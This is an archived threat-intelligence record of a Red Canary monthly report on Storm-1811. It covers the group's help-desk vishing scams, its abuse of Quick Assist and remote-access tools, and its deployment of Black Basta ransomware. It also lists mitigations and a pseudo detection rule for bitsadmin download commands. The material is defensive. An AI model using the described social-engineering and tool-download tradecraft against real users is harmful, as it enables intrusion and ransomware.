{
	"id": "250f3cf9-9aa8-4bb1-a028-e006366328c9",
	"created_at": "2026-04-06T00:07:50.738267Z",
	"updated_at": "2026-04-10T13:11:44.900956Z",
	"deleted_at": null,
	"sha1_hash": "2cf407d7bd64eaa759898223b02db30245d75b48",
	"title": "Intelligence Insights: June 2024",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 74198,
	"plain_text": "Intelligence Insights: June 2024\r\nBy susannah.matt@redcanary.com\r\nArchived: 2026-04-05 13:08:12 UTC\r\n⬆ = trending up from previous month\r\n⬇= trending down from previous month\r\n➡ = no change in rank from previous month\r\n*Denotes a tie\r\nTracking Storm-1811’s help desk scams\r\nOur newcomer to the list this month is Storm-1811. Beginning in late April 2024 and continuing throughout May,\r\nRed Canary saw an activity cluster that we are tracking as Storm-1811. This is Microsoft’s name for a financially\r\nmotivated threat actor that uses social engineering to gain initial access to environments via remote monitoring\r\nand management (RMM) tools—including Microsoft Quick Assist—on victim endpoints.\r\nStorm-1811 leverages different  communication methods in ways that increase the effectiveness of their social\r\nengineering scams. They use voice phishing (aka vishing) and call users masquerading as tech support, sometimes\r\nafter reportedly flooding the users’ inboxes with emails. In recent attacks they have also reportedly used Microsoft\r\nTeams messages to increase their credibility as IT staff, according to Microsoft. The adversary convinces victims\r\nto provide remote access through Microsoft Quick Assist or by downloading and running AnyDesk.\r\nAfter the adversary gains access, we observed Storm-1811 using  curl to download additional tools like OpenSSH,\r\nScreenConnect, and NetSupport Manager. Other reported payloads include Impacket, used for lateral movement,\r\nand PsExec, used to deploy Black Basta ransomware\r\nSocial engineering attacks are, admittedly, hard to combat. Some mitigation strategies to consider are:\r\nTraining users to verify the identity of IT staff that call them via trusted internal methods, for example\r\nconfirming identities with video calls or requiring a shared secret like the endpoint in question’s serial\r\nnumber.\r\nQuickAssist is installed by default on Windows machines. If it is not in use in your environment, disable or\r\nuninstall it.\r\nInventory the RMMs that are approved for use in your environment. Investigate security alerts for\r\nunapproved RMMs and also suspicious activity related to approved RMMs. If possible, block RMMs\r\ncommonly used in malicious attacks—for example, NetSupport, AnyDesk and ScreenConnect—that aren’t\r\nin use in your environment.\r\nRed Canary also saw Storm-1811 use bitsadmin.exe to download follow-on payloads. This gives us a detection\r\nopportunity.\r\nhttps://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2024/\r\nPage 1 of 2\n\nDetection opportunity: Executing the Background Intelligent Transfer Service ( bitsadmin.exe )\r\nto download files\r\nThis pseudo detection analytic identifies execution of the Background Intelligent Transfer Service\r\n( bitsadmin.exe ) with command options to signal file downloads. Adversaries like Storm-1811 use\r\nbitsadmin.exe to download malware as a way of bypassing application whitelisting solutions. Note that\r\nbitsadmin.exe may be used legitimately by some administration software in your environment.\r\nprocess == ( bitsadmin )\r\n\u0026\u0026\r\ncommand_line_includes == ( download )\r\n\u0026\u0026\r\ndeobfuscated_command_line_includes == ( bitsadmin , download )\r\n\u0026\u0026\r\ncommand_line_does_not_include == ( * )\r\nNote: * is a placeholder for strings associated with legitimate use of bitsadmin in your environment\r\nIn case you missed it: Open your scripts with Notepad\r\nMany malware families use scripts as part of their intrusions. They have been popular with adversaries for years, a\r\ntrend that shows no sign of slowing down. These lures can come in the form of multiple script types, including\r\nJavaScript, and delivered multiple ways.\r\nIf a trusting user opens that malicious script, one way to mitigate script execution is to create a Group Policy\r\nObject (GPO) to change the default behavior of commonly misused script extensions, making them behave like\r\nbenign text files that open in Notepad and do not automatically execute. On May 31, Jeff Felling and Red Canary\r\npublished a blog about recent prevalent threats like SocGholish and Gootloader that use this technique, and shared\r\nspecific details on how to create these GPOs to help protect your environment.\r\nSource: https://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2024/\r\nhttps://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2024/\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2024/"
	],
	"report_names": [
		"intelligence-insights-june-2024"
	],
	"threat_actors": [
		{
			"id": "908cf62e-45cd-492b-bf12-d0902e12fece",
			"created_at": "2024-08-20T02:00:04.543947Z",
			"updated_at": "2026-04-10T02:00:03.68848Z",
			"deleted_at": null,
			"main_name": "UNC4393",
			"aliases": [
				"Storm-1811",
				"CURLY SPIDER",
				"STAC5777"
			],
			"source_name": "MISPGALAXY:UNC4393",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6bc98fce-5e1c-46d8-9d1a-64b5cb5febc3",
			"created_at": "2025-04-23T02:00:55.20526Z",
			"updated_at": "2026-04-10T02:00:05.307504Z",
			"deleted_at": null,
			"main_name": "Storm-1811",
			"aliases": [
				"Storm-1811"
			],
			"source_name": "MITRE:Storm-1811",
			"tools": [
				"Black Basta",
				"Cobalt Strike",
				"Quick Assist",
				"BITSAdmin",
				"PsExec",
				"Impacket",
				"QakBot"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434070,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2cf407d7bd64eaa759898223b02db30245d75b48.pdf",
		"text": "https://archive.orkl.eu/2cf407d7bd64eaa759898223b02db30245d75b48.txt",
		"img": "https://archive.orkl.eu/2cf407d7bd64eaa759898223b02db30245d75b48.jpg"
	}
}